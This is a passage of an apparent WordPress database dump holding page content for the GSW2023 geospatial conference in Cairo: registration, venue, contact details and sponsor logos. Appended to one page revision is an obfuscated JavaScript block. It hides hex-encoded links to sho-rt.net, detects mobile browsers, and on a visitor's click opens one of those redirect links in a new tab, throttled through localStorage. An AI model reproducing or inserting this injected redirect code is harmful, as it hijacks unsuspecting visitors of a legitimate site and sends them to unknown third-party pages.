!important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 06:26:14','2023-05-17 06:26:14','',3066,'https://gsw2023.com/?p=4542',0,'revision','',0),
(4543,1,'2023-05-17 06:30:51','2023-05-17 06:30:51','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684304999569{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #f7f763;\"><strong><span style=\"font-size: 24pt;\">BOOK YOUR HOTEL NOW</span></strong></span></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button 